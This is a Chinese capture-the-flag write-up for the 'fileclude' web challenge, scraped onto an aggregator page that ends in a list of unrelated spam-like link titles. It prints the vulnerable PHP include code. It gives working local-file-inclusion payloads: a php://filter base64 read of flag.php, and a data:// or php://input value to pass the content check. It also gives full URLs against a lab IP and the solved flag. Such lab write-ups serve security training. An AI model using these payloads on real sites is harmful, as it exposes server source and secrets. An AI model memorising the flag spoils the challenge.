当前位置: 首页 > news >正文

攻防世界-Web-fileclude

news 2025/10/5 20:55:52

知识点

1.php伪协议

2.file_get_contents($file2)理解

步骤

1.打开网站,阅读php源码

?php
include("flag.php"); //包含flag
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{$file1 = $_GET["file1"];$file2 = $_GET["file2"];if(!empty($file1) && !empty($file2)) //file1和file2均存在{if(file_get_contents($file2) === "hello ctf") //读取传入的file2路径上的文件的内容{include($file1);}}elsedie("NONONO");
}

1.构造file1

flag存在flag.php,所以要读取flag.php的内容。因为直接包含flag.php,会执行里面的php代码,而无回显,所以要使用伪协议

file1=php://filter/read=convert.base64-encode/resource=flag.php

2.构造file2

file_get_contents($file2)接收的是一个有效的文件路径,并会尝试读取该文件的内容。

当使用 data:// 或 php://input 时,传递的值被解释为一种特殊的输入流,而不是文件名。

file2=data://text/plain,hello ctf
或者
file2=php://input
post提交hello ctf

3.构造payload

http://61.147.171.103:64422/index.php?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello ctf
或者
http://61.147.171.103:64422/index.php?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

4.解码

flag{1nlude_and_g0T_1T!}

http://www.dtcms.com/a/444475.html

相关文章:

  • 网站建设增城广告设计专业就业方向
  • 魔云手机建站哪个外贸网站开发客户比较好用
  • 免费空间说说赞领取网站微信电脑版官方下载
  • 温州做网站的爱站长尾词
  • 视频剪辑素材免费网站wordpress插件 网站跳转
  • wordpress 自定义文章类型 分页南宁seo主管
  • 优质的中小型网站建设wordpress 如何获得数据库数据
  • 电商旅游网站策划书有什么网站接效果图做的
  • 5-19 WPS JS宏find、findIndex数组的查找迭代与indexOf、lastIndexOf、includes、in系列函数(数组查找判断)
  • 房城乡建设部门户网站昆明排名优化
  • 网站建设流程是什么wordpress文章采集
  • canva在线平面设计官网网站优化软件哪个好
  • 汝阳网站建设哪家好微信社群管理
  • 做纺织行业的网站大连网站建设招聘网
  • 给网站建设提意见做购物商城网站设计
  • 南京学校网站制作传统网站 手机网站
  • 无锡企业网站制作报价普陀网站制作有哪些
  • 手机网站有什么区别是什么意思东莞网站建设方案托管
  • FileZilla做网站重庆建造师管理系统查询系统
  • 面包类网站设计网站建设商
  • 网站建设基础问题网站建设联系
  • 济南企业建站怎么样gg模板网
  • 网站域名权麻章手机网站建设公司
  • win 2012 iis 默认网站网站如何快速收录
  • 有了域名搭建网站详细步骤WordPress的固态链接
  • 网站建设需申请注册域名中国网站建设公司前十名
  • 一个网站如何工作流程做网站买别人的服务器
  • 做海外网站的公司wordpress官方的三个主题好排名
  • 一般网站海报做一张多久厚街手机网站制作
  • 仁寿县建设局网站微商手机网站模板